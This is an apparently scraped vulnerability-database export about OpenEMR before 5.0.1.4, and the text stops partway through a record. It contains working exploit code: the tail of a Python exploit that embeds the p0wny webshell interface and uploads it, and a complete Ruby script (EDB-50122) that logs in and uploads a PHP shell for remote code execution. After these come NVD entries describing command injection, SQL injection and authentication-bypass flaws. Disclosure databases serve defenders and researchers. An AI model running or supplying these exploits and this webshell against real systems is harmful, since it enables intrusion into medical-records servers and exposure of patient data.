eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n 
_insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? 
currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"p0wny@shell:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = 
cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n 
try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. 
_|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_dest_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_education\\\"; filename=\\\"\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"bn_save\\\"\\r\\n\\r\\nSave\\r\\n-----------------------------31900464228840324774249185339--\\r\\n\"\n\n# Send Exploit:\nsession.post(exploit_url, headers=header, data=body)\n\n# Finish\npath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php'\nprint('[+] Webshell: ' + path)", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/49998.py", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T18:30:16", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-07-13T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15139", "CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "EDB-ID:50122", "href": "https://www.exploit-db.com/exploits/50122", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Date: 2021-07-05\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of 
the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50122.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-07T14:30:49", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/fax/fax_dispatch.php after modifying the \"hylafax_enscript\" global variable in interface/super/edit_globals.php.", 
"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15155", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15155"], "modified": "2018-10-10T17:19:00", "cpe": [], "id": "CVE-2018-15155", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15155", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:53", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/billing/sl_eob_search.php after modifying the \"print_command\" global variable in interface/super/edit_globals.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15154", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15154"], "modified": "2018-10-10T17:21:00", "cpe": [], "id": "CVE-2018-15154", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15154", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:54", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/main/daemon_frame.php after modifying the \"hylafax_server\" global variable in interface/super/edit_globals.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15153", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15153"], "modified": "2018-10-10T17:20:00", "cpe": [], "id": "CVE-2018-15153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15153", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:52", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/fax/faxq.php after modifying the \"hylafax_server\" global variable in interface/super/edit_globals.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15156", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15156"], "modified": "2018-10-10T17:17:00", "cpe": [], "id": "CVE-2018-15156", 
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15156", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:54", "description": "SQL injection vulnerability in interface/de_identification_forms/de_identification_screen2.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'temporary_files_dir' variable in interface/super/edit_globals.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15150", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15150"], "modified": "2018-10-12T13:10:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15150", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15150", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:48", "description": "SQL injection vulnerability in interface/patient_file/encounter/search_code.php in versions of OpenEMR 
before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'text' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15148", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15148"], "modified": "2018-10-12T13:08:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15148", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15148", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:48", "description": "SQL injection vulnerability in interface/de_identification_forms/find_immunization_popup.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'search_term' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15146", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15146"], "modified": "2018-10-11T16:41:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15146", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15146", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:52", "description": "SQL injection vulnerability in interface/forms_admin/forms_admin.php from library/registry.inc in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'id' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15147", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15147"], "modified": "2018-10-12T13:07:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15147", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15147", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:55", "description": "Authentication bypass vulnerability in portal/account/register.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker to access (1) portal/add_edit_event_user.php, (2) portal/find_appt_popup_user.php, (3) portal/get_allergies.php, (4) portal/get_amendments.php, (5) portal/get_lab_results.php, (6) portal/get_medications.php, (7) portal/get_patient_documents.php, (8) portal/get_problems.php, (9) portal/get_profile.php, (10) portal/portal_payment.php, (11) portal/messaging/messages.php, (12) portal/messaging/secure_chat.php, (13) portal/report/pat_ledger.php, (14) portal/report/portal_custom_report.php, or (15) portal/report/portal_patient_report.php without authenticating as a patient.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": 
"2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15152", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15152"], "modified": "2022-02-10T07:24:00", "cpe": [], "id": "CVE-2018-15152", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15152", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:52", "description": "SQL injection vulnerability in interface/forms/eye_mag/php/Anything_simple.php from library/forms.inc in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'encounter' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", 